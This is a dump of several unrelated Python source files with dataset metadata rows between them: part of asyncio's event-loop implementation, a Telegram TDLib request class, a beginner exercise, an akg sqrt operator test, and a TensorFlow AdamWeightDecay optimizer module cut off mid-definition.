                    reuse_port or allow_broadcast):
                # Socket options conflict with a caller-supplied socket.
                opts = dict(local_addr=local_addr, remote_addr=remote_addr,
                            family=family, proto=proto, flags=flags,
                            reuse_address=reuse_address, reuse_port=reuse_port,
                            allow_broadcast=allow_broadcast)
                problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
                raise ValueError(
                    f'socket modifier keyword arguments can not be used '
                    f'when sock is specified. ({problems})')
            sock.setblocking(False)
            r_addr = None
        else:
            if not (local_addr or remote_addr):
                if family == 0:
                    raise ValueError('unexpected address family')
                addr_pairs_info = (((family, proto), (None, None)),)
            elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
                # Unix-domain datagram addresses are path strings.
                for addr in (local_addr, remote_addr):
                    if addr is not None and not isinstance(addr, str):
                        raise TypeError('string is expected')
                addr_pairs_info = (((family, proto),
                                    (local_addr, remote_addr)), )
            else:
                # Resolve both addresses and join them per (family, proto)
                # so a candidate pair shares one socket configuration.
                addr_infos = collections.OrderedDict()
                for idx, addr in ((0, local_addr), (1, remote_addr)):
                    if addr is not None:
                        assert isinstance(addr, tuple) and len(addr) == 2, (
                            '2-tuple is expected')
                        infos = await self._ensure_resolved(
                            addr, family=family, type=socket.SOCK_DGRAM,
                            proto=proto, flags=flags, loop=self)
                        if not infos:
                            raise OSError('getaddrinfo() returned empty list')
                        for fam, _, pro, _, address in infos:
                            key = (fam, pro)
                            if key not in addr_infos:
                                addr_infos[key] = [None, None]
                            addr_infos[key][idx] = address
                # Keep only pairs resolved for every requested side.
                addr_pairs_info = [
                    (key, addr_pair) for key, addr_pair in addr_infos.items()
                    if not ((local_addr and addr_pair[0] is None) or
                            (remote_addr and addr_pair[1] is None))]
                if not addr_pairs_info:
                    raise ValueError('can not get address information')
        exceptions = []
        # reuse_address: explicit True is forbidden; explicit False/None
        # only triggers the deprecation warning (bpo-37228).
        if reuse_address is not _unset:
            if reuse_address:
                raise ValueError("Passing `reuse_address=True` is no "
                                 "longer supported, as the usage of "
                                 "SO_REUSEPORT in UDP poses a significant "
                                 "security concern.")
            else:
                warnings.warn("The *reuse_address* parameter has been "
                              "deprecated as of 3.7.6 and is scheduled "
                              "for removal in 3.11.", DeprecationWarning,
                              stacklevel=2)
        for ((family, proto),
             (local_address, remote_address)) in addr_pairs_info:
            sock = None
            r_addr = None
            try:
                sock = socket.socket(
                    family=family, type=socket.SOCK_DGRAM, proto=proto)
                if reuse_port:
                    _set_reuseport(sock)
                if allow_broadcast:
                    sock.setsockopt(
                        socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
                sock.setblocking(False)
                if local_addr:
                    sock.bind(local_address)
                if remote_addr:
                    if not allow_broadcast:
                        await self.sock_connect(sock, remote_address)
                    r_addr = remote_address
            except OSError as exc:
                if sock is not None:
                    sock.close()
                exceptions.append(exc)
            except:
                if sock is not None:
                    sock.close()
                raise
            else:
                break
        else:
            # Every candidate failed; surface the first error.
            raise exceptions[0]
        protocol = protocol_factory()
        waiter = self.create_future()
        transport = self._make_datagram_transport(
            sock, protocol, r_addr, waiter)
        if self._debug:
            if local_addr:
                logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
                            "created: (%r, %r)",
                            local_addr, remote_addr, transport, protocol)
            else:
                logger.debug("Datagram endpoint remote_addr=%r created: "
                             "(%r, %r)",
                             remote_addr, transport, protocol)
        try:
            await waiter
        except:
            transport.close()
            raise
        return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
    async def _create_server_getaddrinfo(self, host, port, family, flags):
        """Resolve one listening host/port; raise OSError on empty result."""
        infos = await self._ensure_resolved((host, port), family=family,
                                            type=socket.SOCK_STREAM,
                                            flags=flags, loop=self)
        if not infos:
            raise OSError(f'getaddrinfo({host!r}) returned empty list')
        return infos
    async def create_server(
            self, protocol_factory, host=None, port=None,
            *,
            family=socket.AF_UNSPEC,
            flags=socket.AI_PASSIVE,
            sock=None,
            backlog=100,
            ssl=None,
            reuse_address=None,
            reuse_port=None,
            ssl_handshake_timeout=None,
            start_serving=True):
        """Create a listening TCP server; return a Server object.

        *host* may be a string, an iterable of strings, or '' / None for
        all interfaces; one socket is bound per resolved address.  All
        sockets are closed if any bind fails.
        """
        if isinstance(ssl, bool):
            raise TypeError('ssl argument must be an SSLContext or None')
        if ssl_handshake_timeout is not None and ssl is None:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')
        if host is not None or port is not None:
            if sock is not None:
                raise ValueError(
                    'host/port and sock can not be specified at the same time')
            if reuse_address is None:
                # Default SO_REUSEADDR on POSIX (but not Cygwin).
                reuse_address = os.name == 'posix' and sys.platform != 'cygwin'
            sockets = []
            if host == '':
                hosts = [None]
            elif (isinstance(host, str) or
                  not isinstance(host, collections.abc.Iterable)):
                hosts = [host]
            else:
                hosts = host
            # Resolve all hosts concurrently.
            fs = [self._create_server_getaddrinfo(host, port, family=family,
                                                  flags=flags)
                  for host in hosts]
            infos = await tasks.gather(*fs, loop=self)
            infos = set(itertools.chain.from_iterable(infos))
            completed = False
            try:
                for res in infos:
                    af, socktype, proto, canonname, sa = res
                    try:
                        sock = socket.socket(af, socktype, proto)
                    except socket.error:
                        # Assume it's a bad family/type/protocol combination.
                        if self._debug:
                            logger.warning('create_server() failed to create '
                                           'socket.socket(%r, %r, %r)',
                                           af, socktype, proto, exc_info=True)
                        continue
                    sockets.append(sock)
                    if reuse_address:
                        sock.setsockopt(
                            socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
                    if reuse_port:
                        _set_reuseport(sock)
                    # Disable IPv4/IPv6 dual stack support (enabled by
                    # default on Linux) which makes a single socket
                    # listen on both address families.
                    if (_HAS_IPv6 and
                            af == socket.AF_INET6 and
                            hasattr(socket, 'IPPROTO_IPV6')):
                        sock.setsockopt(socket.IPPROTO_IPV6,
                                        socket.IPV6_V6ONLY,
                                        True)
                    try:
                        sock.bind(sa)
                    except OSError as err:
                        raise OSError(err.errno, 'error while attempting '
                                      'to bind on address %r: %s'
                                      % (sa, err.strerror.lower())) from None
                completed = True
            finally:
                if not completed:
                    for sock in sockets:
                        sock.close()
        else:
            if sock is None:
                raise ValueError('Neither host/port nor sock were specified')
            if sock.type != socket.SOCK_STREAM:
                raise ValueError(f'A Stream Socket was expected, got {sock!r}')
            sockets = [sock]
        for sock in sockets:
            sock.setblocking(False)
        server = Server(self, sockets, protocol_factory,
                        ssl, backlog, ssl_handshake_timeout)
        if start_serving:
            server._start_serving()
            # Skip one loop iteration so that all 'loop.add_reader'
            # go through.
            await tasks.sleep(0, loop=self)
        if self._debug:
            logger.info("%r is serving", server)
        return server
    async def connect_accepted_socket(
            self, protocol_factory, sock,
            *, ssl=None,
            ssl_handshake_timeout=None):
        """Handle an accepted connection on an already-connected socket.

        Used to hand a socket obtained outside the loop (e.g. from a
        blocking accept()) to asyncio.  Returns a (transport, protocol)
        pair.  Raises ValueError if *sock* is not a stream socket or if
        ssl_handshake_timeout is given without ssl.
        """
        if sock.type != socket.SOCK_STREAM:
            raise ValueError(f'A Stream Socket was expected, got {sock!r}')
        if ssl_handshake_timeout is not None and not ssl:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')
        transport, protocol = await self._create_connection_transport(
            sock, protocol_factory, ssl, '', server_side=True,
            ssl_handshake_timeout=ssl_handshake_timeout)
        if self._debug:
            # Get the socket from the transport because SSL transport closes
            # the old socket and creates a new SSL socket
            sock = transport.get_extra_info('socket')
            logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
        return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0, **kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
popen_args = (program,) + args
for arg in popen_args:
if not isinstance(arg, (str, bytes)):
raise TypeError(
f"program arguments must be a bytes or text string, "
f"not {type(arg).__name__}")
protocol = protocol_factory()
debug_log = None
if self._debug:
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
    def get_exception_handler(self):
        """Return the custom exception handler, or None if the default is in use."""
        return self._exception_handler
def set_exception_handler(self, handler):
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
    def default_exception_handler(self, context):
        """Default handler for exceptions not caught anywhere else.

        Logs every key/value pair of *context* (with special pretty-printing
        for the recorded tracebacks) as a single logger.error record.  Used
        when no custom handler is set, and as the fallback when the custom
        handler itself raises.
        """
        message = context.get('message')
        if not message:
            message = 'Unhandled exception in event loop'
        exception = context.get('exception')
        if exception is not None:
            exc_info = (type(exception), exception, exception.__traceback__)
        else:
            exc_info = False
        # If the offending callback didn't record where it was created,
        # fall back to where the currently-running handle was created.
        if ('source_traceback' not in context and
                self._current_handle is not None and
                self._current_handle._source_traceback):
            context['handle_traceback'] = \
                self._current_handle._source_traceback
        log_lines = [message]
        for key in sorted(context):
            if key in {'message', 'exception'}:
                continue
            value = context[key]
            if key == 'source_traceback':
                tb = ''.join(traceback.format_list(value))
                value = 'Object created at (most recent call last):\n'
                value += tb.rstrip()
            elif key == 'handle_traceback':
                tb = ''.join(traceback.format_list(value))
                value = 'Handle created at (most recent call last):\n'
                value += tb.rstrip()
            else:
                value = repr(value)
            log_lines.append(f'{key}: {value}')
        logger.error('\n'.join(log_lines), exc_info=exc_info)
    def call_exception_handler(self, context):
        """Dispatch *context* to the configured exception handler.

        Falls back through three layers so an error in error handling can
        never crash the loop: custom handler -> default handler -> plain
        logger.error.
        """
        if self._exception_handler is None:
            try:
                self.default_exception_handler(context)
            except Exception:
                # Second protection layer for unexpected errors
                # in the default implementation, as well as for subclassed
                # event loops with overloaded "default_exception_handler".
                logger.error('Exception in default exception handler',
                             exc_info=True)
        else:
            try:
                self._exception_handler(self, context)
            except Exception as exc:
                # Exception in the user set custom exception handler.
                try:
                    # Let's try default handler.
                    self.default_exception_handler({
                        'message': 'Unhandled error in exception handler',
                        'exception': exc,
                        'context': context,
                    })
                except Exception:
                    # Last resort: never let error handling raise.
                    logger.error('Exception in default exception handler '
                                 'while handling an unexpected error '
                                 'in custom exception handler',
                                 exc_info=True)
def _add_callback(self, handle):
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
    def _add_callback_signalsafe(self, handle):
        """Like _add_callback() but callable from a signal handler.

        Writes to the self-pipe so a loop blocked in select() wakes up.
        """
        self._add_callback(handle)
        self._write_to_self()
    def _timer_handle_cancelled(self, handle):
        """Notification that a TimerHandle was cancelled; feeds the purge heuristic in _run_once()."""
        if handle._scheduled:
            self._timer_cancelled_count += 1
    def _run_once(self):
        """Run one full iteration of the event loop.

        Purges cancelled timers, polls for I/O with a timeout derived from
        the timer heap, processes the resulting events, then runs every
        callback that is currently ready.  Callbacks scheduled while this
        iteration runs execute on the *next* iteration.
        """
        # Purge cancelled timers: rebuild the heap wholesale when the
        # fraction of cancelled entries is high, otherwise just pop
        # cancelled timers off the head of the heap.
        sched_count = len(self._scheduled)
        if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
            self._timer_cancelled_count / sched_count >
                _MIN_CANCELLED_TIMER_HANDLES_FRACTION):
            new_scheduled = []
            for handle in self._scheduled:
                if handle._cancelled:
                    handle._scheduled = False
                else:
                    new_scheduled.append(handle)
            heapq.heapify(new_scheduled)
            self._scheduled = new_scheduled
            self._timer_cancelled_count = 0
        else:
            while self._scheduled and self._scheduled[0]._cancelled:
                self._timer_cancelled_count -= 1
                handle = heapq.heappop(self._scheduled)
                handle._scheduled = False
        # Choose the select() timeout: 0 when work is already pending (or
        # the loop is stopping), else the delay until the earliest timer,
        # capped at MAXIMUM_SELECT_TIMEOUT; None means "block forever".
        timeout = None
        if self._ready or self._stopping:
            timeout = 0
        elif self._scheduled:
            when = self._scheduled[0]._when
            timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
        if self._debug and timeout != 0:
            # In debug mode, time the poll and log slow/selective polls.
            t0 = self.time()
            event_list = self._selector.select(timeout)
            dt = self.time() - t0
            if dt >= 1.0:
                level = logging.INFO
            else:
                level = logging.DEBUG
            nevent = len(event_list)
            if timeout is None:
                logger.log(level, 'poll took %.3f ms: %s events',
                           dt * 1e3, nevent)
            elif nevent:
                logger.log(level,
                           'poll %.3f ms took %.3f ms: %s events',
                           timeout * 1e3, dt * 1e3, nevent)
            elif dt >= 1.0:
                logger.log(level,
                           'poll %.3f ms took %.3f ms: timeout',
                           timeout * 1e3, dt * 1e3)
        else:
            event_list = self._selector.select(timeout)
        self._process_events(event_list)
        # Move timers whose deadline falls within one clock resolution of
        # "now" onto the ready queue.
        end_time = self.time() + self._clock_resolution
        while self._scheduled:
            handle = self._scheduled[0]
            if handle._when >= end_time:
                break
            handle = heapq.heappop(self._scheduled)
            handle._scheduled = False
            self._ready.append(handle)
        # This is the only place where callbacks are actually *called*.
        # len() is captured up front so callbacks added by a callback run
        # on the next iteration, not this one.
        ntodo = len(self._ready)
        for i in range(ntodo):
            handle = self._ready.popleft()
            if handle._cancelled:
                continue
            if self._debug:
                try:
                    self._current_handle = handle
                    t0 = self.time()
                    handle._run()
                    dt = self.time() - t0
                    if dt >= self.slow_callback_duration:
                        logger.warning('Executing %s took %.3f seconds',
                                       _format_handle(handle), dt)
                finally:
                    self._current_handle = None
            else:
                handle._run()
        handle = None  # Needed to break cycles when an exception occurs.
    def _set_coroutine_origin_tracking(self, enabled):
        """Toggle sys coroutine origin tracking, saving/restoring the prior depth.

        No-op when the requested state matches the current one.
        """
        if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
            return
        if enabled:
            # Remember the interpreter-wide depth so disabling restores it.
            self._coroutine_origin_tracking_saved_depth = (
                sys.get_coroutine_origin_tracking_depth())
            sys.set_coroutine_origin_tracking_depth(
                constants.DEBUG_STACK_DEPTH)
        else:
            sys.set_coroutine_origin_tracking_depth(
                self._coroutine_origin_tracking_saved_depth)
        self._coroutine_origin_tracking_enabled = enabled
    def get_debug(self):
        """Return True if the event loop is in debug mode."""
        return self._debug
    def set_debug(self, enabled):
        """Enable/disable debug mode; syncs coroutine origin tracking if the loop is running."""
        self._debug = enabled
        if self.is_running():
            self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
| true | true |
f7233710fba4a95cd8b296a5f05d5e35c418997d | 1,867 | py | Python | pytglib/api/functions/search_secret_messages.py | iTeam-co/pytglib | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 6 | 2019-10-30T08:57:27.000Z | 2021-02-08T14:17:43.000Z | pytglib/api/functions/search_secret_messages.py | iTeam-co/python-telegram | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 1 | 2021-08-19T05:44:10.000Z | 2021-08-19T07:14:56.000Z | pytglib/api/functions/search_secret_messages.py | iTeam-co/python-telegram | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 5 | 2019-12-04T05:30:39.000Z | 2021-05-21T18:23:32.000Z |
from ..utils import Object
class SearchSecretMessages(Object):
    """
    Searches for messages in secret chats. Returns the results in reverse
    chronological order. For optimal performance the number of returned
    messages is chosen by the library.

    Attributes:
        ID (:obj:`str`): ``SearchSecretMessages``

    Args:
        chat_id (:obj:`int`):
            Identifier of the chat in which to search. Specify 0 to search
            in all secret chats
        query (:obj:`str`):
            Query to search for. If empty, searchChatMessages should be
            used instead
        from_search_id (:obj:`int`):
            The identifier from the result of a previous request; use 0 to
            get results from the last message
        limit (:obj:`int`):
            The maximum number of messages to be returned; up to 100.
            Fewer messages may be returned than specified by the limit,
            even if the end of the message history has not been reached
        filter (:class:`telegram.api.types.SearchMessagesFilter`):
            A filter for the content of messages in the search results

    Returns:
        FoundMessages

    Raises:
        :class:`telegram.Error`
    """
    ID = "searchSecretMessages"

    def __init__(self, chat_id, query, from_search_id, limit, filter, extra=None, **kwargs):
        self.extra = extra
        self.chat_id = chat_id  # int
        self.query = query  # str
        self.from_search_id = from_search_id  # int
        self.limit = limit  # int
        self.filter = filter  # SearchMessagesFilter

    @staticmethod
    def read(q: dict, *args) -> "SearchSecretMessages":
        # Rebuild the request object from a raw TDLib dict; the nested
        # filter is deserialized through the generic Object reader.
        return SearchSecretMessages(
            q.get('chat_id'),
            q.get('query'),
            q.get('from_search_id'),
            q.get('limit'),
            Object.read(q.get('filter')),
        )
| 38.102041 | 187 | 0.654526 |
from ..utils import Object
class SearchSecretMessages(Object):
ID = "searchSecretMessages"
def __init__(self, chat_id, query, from_search_id, limit, filter, extra=None, **kwargs):
self.extra = extra
self.chat_id = chat_id
self.query = query
self.from_search_id = from_search_id
self.limit = limit
self.filter = filter
@staticmethod
def read(q: dict, *args) -> "SearchSecretMessages":
chat_id = q.get('chat_id')
query = q.get('query')
from_search_id = q.get('from_search_id')
limit = q.get('limit')
filter = Object.read(q.get('filter'))
return SearchSecretMessages(chat_id, query, from_search_id, limit, filter)
| true | true |
f72337d82a632098716ab7ff948e4fedf29d080d | 310 | py | Python | Desafios/exerc28.py | pedronb/Exercicios-Python | 54db2ce48bbbba94a4ac25b32b3c1fd985347857 | [
"MIT"
] | null | null | null | Desafios/exerc28.py | pedronb/Exercicios-Python | 54db2ce48bbbba94a4ac25b32b3c1fd985347857 | [
"MIT"
] | null | null | null | Desafios/exerc28.py | pedronb/Exercicios-Python | 54db2ce48bbbba94a4ac25b32b3c1fd985347857 | [
"MIT"
] | null | null | null | # Exercício Python 28: Desenvolva um programa que leia seis números inteiros e mostre a soma apenas daqueles que forem pares. Se o valor digitado for ímpar, desconsidere-o.
soma = 0
for i in range(0,6):
num = int(input('Insira um número inteiro: '))
if num % 2 == 0:
soma += num
print(soma) | 28.181818 | 172 | 0.683871 |
soma = 0
for i in range(0,6):
num = int(input('Insira um número inteiro: '))
if num % 2 == 0:
soma += num
print(soma) | true | true |
f72338223fcd579b0d8eab318317428813bb0d97 | 2,216 | py | Python | tests/common/test_run/sqrt_run.py | tianjiashuo/akg | a9cbf642063fb1086a93e8bc6be6feb145689817 | [
"Apache-2.0"
] | 286 | 2020-06-23T06:40:44.000Z | 2022-03-30T01:27:49.000Z | tests/common/test_run/sqrt_run.py | tianjiashuo/akg | a9cbf642063fb1086a93e8bc6be6feb145689817 | [
"Apache-2.0"
] | 10 | 2020-07-31T03:26:59.000Z | 2021-12-27T15:00:54.000Z | tests/common/test_run/sqrt_run.py | tianjiashuo/akg | a9cbf642063fb1086a93e8bc6be6feb145689817 | [
"Apache-2.0"
] | 30 | 2020-07-17T01:04:14.000Z | 2021-12-27T14:05:19.000Z | # Copyright 2019-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import akg
import numpy as np
from akg.utils import kernel_exec as utils
from akg.ops.math import Sqrt
from tests.common.tensorio import compare_tensor
from tests.common.gen_random import random_gaussian
from akg.utils.result_analysis import target_profiling
from akg.utils.format_transform import to_tvm_nd_array
def sqrt_run(shape, dtype, attrs):
    """Build and exercise the akg Sqrt operator for one (shape, dtype) case.

    In tuning mode (attrs['tuning'] truthy) returns the built module plus
    the expected result and launch args; otherwise launches the kernel,
    optionally profiles it, and returns
    (input, output, expect, compare_ok).
    """
    if 'tuning' in attrs.keys():
        t = attrs.get("tuning", False)
        kernel_name = attrs.get("kernel_name", False)
        mod = utils.op_build_test(Sqrt, [shape], [dtype], kernel_name=kernel_name, attrs=attrs, tuning=t)
        if t:
            expect, input, output = gen_data(dtype, shape)
            return mod, expect, (input, output)
        else:
            return mod
    else:
        expect, input, output = gen_data(dtype, shape)
        mod = utils.op_build_test(Sqrt, [shape], [dtype], kernel_name='sqrt', attrs=attrs)
        output = utils.mod_launch(mod, (input, output), expect=expect)
        if attrs.get("profiling", False):
            # NOTE(review): assumes attrs["target"] looks like "cuda 0" and
            # attrs["repeat_times"] is present when profiling — confirm callers.
            target_name = attrs["target"].split()[0]
            args_list = to_tvm_nd_array([input, output], akg.tvm.context(target_name, 0))
            target_profiling(mod, *args_list, target=target_name, repeat_time=attrs["repeat_times"])
        return input, output, expect, compare_tensor(output, expect, rtol=5e-03, equal_nan=True)
def gen_data(dtype, shape):
    """Return (expect, input, output) for the sqrt op test.

    The input is a non-negative Gaussian sample, expect = sqrt(input),
    and output is a NaN-filled placeholder the kernel writes into.
    """
    sample = np.abs(random_gaussian(shape, miu=1, sigma=0.1).astype(dtype))
    expect = np.sqrt(sample)
    placeholder = np.full(expect.shape, np.nan, dtype)
    return expect, sample, placeholder
| 43.45098 | 105 | 0.704874 |
import akg
import numpy as np
from akg.utils import kernel_exec as utils
from akg.ops.math import Sqrt
from tests.common.tensorio import compare_tensor
from tests.common.gen_random import random_gaussian
from akg.utils.result_analysis import target_profiling
from akg.utils.format_transform import to_tvm_nd_array
def sqrt_run(shape, dtype, attrs):
if 'tuning' in attrs.keys():
t = attrs.get("tuning", False)
kernel_name = attrs.get("kernel_name", False)
mod = utils.op_build_test(Sqrt, [shape], [dtype], kernel_name=kernel_name, attrs=attrs, tuning=t)
if t:
expect, input, output = gen_data(dtype, shape)
return mod, expect, (input, output)
else:
return mod
else:
expect, input, output = gen_data(dtype, shape)
mod = utils.op_build_test(Sqrt, [shape], [dtype], kernel_name='sqrt', attrs=attrs)
output = utils.mod_launch(mod, (input, output), expect=expect)
if attrs.get("profiling", False):
target_name = attrs["target"].split()[0]
args_list = to_tvm_nd_array([input, output], akg.tvm.context(target_name, 0))
target_profiling(mod, *args_list, target=target_name, repeat_time=attrs["repeat_times"])
return input, output, expect, compare_tensor(output, expect, rtol=5e-03, equal_nan=True)
def gen_data(dtype, shape):
input = random_gaussian(shape, miu=1, sigma=0.1).astype(dtype)
input = np.abs(input)
expect = np.sqrt(input)
output = np.full(expect.shape, np.nan, dtype)
return expect, input, output
| true | true |
f72338cabbb47dff386554f0d46e1799a3d64812 | 7,395 | py | Python | official/nlp/optimization.py | zcdzcdzcd/models | a31b526a7617a152a138a865b5689bf5b59f655d | [
"Apache-2.0"
] | 211 | 2019-10-21T14:58:43.000Z | 2022-03-11T12:01:41.000Z | official/nlp/optimization.py | zcdzcdzcd/models | a31b526a7617a152a138a865b5689bf5b59f655d | [
"Apache-2.0"
] | 18 | 2019-10-30T16:14:31.000Z | 2022-02-09T23:31:56.000Z | official/nlp/optimization.py | zcdzcdzcd/models | a31b526a7617a152a138a865b5689bf5b59f655d | [
"Apache-2.0"
] | 74 | 2019-10-25T13:57:51.000Z | 2022-02-04T03:56:10.000Z | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions and classes related to optimization (weight updates)."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import tensorflow as tf
class WarmUp(tf.keras.optimizers.schedules.LearningRateSchedule):
  """Applies a warmup schedule on top of a given learning rate decay schedule.

  For steps below `warmup_steps` the learning rate ramps up polynomially
  from 0 to `initial_learning_rate`; afterwards `decay_schedule_fn(step)`
  takes over.
  """

  def __init__(
      self,
      initial_learning_rate,
      decay_schedule_fn,
      warmup_steps,
      power=1.0,
      name=None):
    """Args:
      initial_learning_rate: peak LR reached at the end of warmup.
      decay_schedule_fn: schedule used once warmup is over.
      warmup_steps: number of warmup steps.
      power: exponent of the polynomial warmup (1.0 = linear).
      name: optional name scope.
    """
    super(WarmUp, self).__init__()
    self.initial_learning_rate = initial_learning_rate
    self.warmup_steps = warmup_steps
    self.power = power
    self.decay_schedule_fn = decay_schedule_fn
    self.name = name

  def __call__(self, step):
    with tf.name_scope(self.name or 'WarmUp') as name:
      # Implements polynomial warmup. i.e., if global_step < warmup_steps, the
      # learning rate will be `global_step/num_warmup_steps * init_lr`.
      global_step_float = tf.cast(step, tf.float32)
      warmup_steps_float = tf.cast(self.warmup_steps, tf.float32)
      warmup_percent_done = global_step_float / warmup_steps_float
      warmup_learning_rate = (
          self.initial_learning_rate *
          tf.math.pow(warmup_percent_done, self.power))
      # Graph-mode branch between warmup and the wrapped decay schedule.
      return tf.cond(global_step_float < warmup_steps_float,
                     lambda: warmup_learning_rate,
                     lambda: self.decay_schedule_fn(step),
                     name=name)

  def get_config(self):
    # Serialization config for Keras; note decay_schedule_fn is stored
    # as the object itself.
    return {
        'initial_learning_rate': self.initial_learning_rate,
        'decay_schedule_fn': self.decay_schedule_fn,
        'warmup_steps': self.warmup_steps,
        'power': self.power,
        'name': self.name
    }
def create_optimizer(init_lr, num_train_steps, num_warmup_steps):
  """Create an AdamWeightDecay optimizer with linear decay + optional warmup.

  The LR decays linearly from `init_lr` to 0 over `num_train_steps`; when
  `num_warmup_steps` is non-zero the schedule is wrapped in a WarmUp ramp.
  """
  lr_schedule = tf.keras.optimizers.schedules.PolynomialDecay(
      initial_learning_rate=init_lr,
      decay_steps=num_train_steps,
      end_learning_rate=0.0)
  if num_warmup_steps:
    lr_schedule = WarmUp(
        initial_learning_rate=init_lr,
        decay_schedule_fn=lr_schedule,
        warmup_steps=num_warmup_steps)
  return AdamWeightDecay(
      learning_rate=lr_schedule,
      weight_decay_rate=0.01,
      beta_1=0.9,
      beta_2=0.999,
      epsilon=1e-6,
      exclude_from_weight_decay=['layer_norm', 'bias'])
class AdamWeightDecay(tf.keras.optimizers.Adam):
  """Adam enables L2 weight decay and clip_by_global_norm on gradients.

  Just adding the square of the weights to the loss function is *not* the
  correct way of using L2 regularization/weight decay with Adam, since that
  will interact with the m and v parameters in strange ways.

  Instead we want to decay the weights in a manner that doesn't interact
  with the m/v parameters. This is equivalent to adding the square of the
  weights to the loss with plain (non-momentum) SGD.
  """

  def __init__(self,
               learning_rate=0.001,
               beta_1=0.9,
               beta_2=0.999,
               epsilon=1e-7,
               amsgrad=False,
               weight_decay_rate=0.0,
               include_in_weight_decay=None,
               exclude_from_weight_decay=None,
               name='AdamWeightDecay',
               **kwargs):
    """Args mirror tf.keras.optimizers.Adam, plus:
      weight_decay_rate: decoupled weight-decay coefficient.
      include_in_weight_decay: regexes of variables to always decay.
      exclude_from_weight_decay: regexes of variables to never decay
        (checked only when include_in_weight_decay doesn't match).
    """
    super(AdamWeightDecay, self).__init__(
        learning_rate, beta_1, beta_2, epsilon, amsgrad, name, **kwargs)
    self.weight_decay_rate = weight_decay_rate
    self._include_in_weight_decay = include_in_weight_decay
    self._exclude_from_weight_decay = exclude_from_weight_decay

  @classmethod
  def from_config(cls, config):
    """Creates an optimizer from its config with WarmUp custom object."""
    custom_objects = {'WarmUp': WarmUp}
    return super(AdamWeightDecay, cls).from_config(
        config, custom_objects=custom_objects)

  def _prepare_local(self, var_device, var_dtype, apply_state):
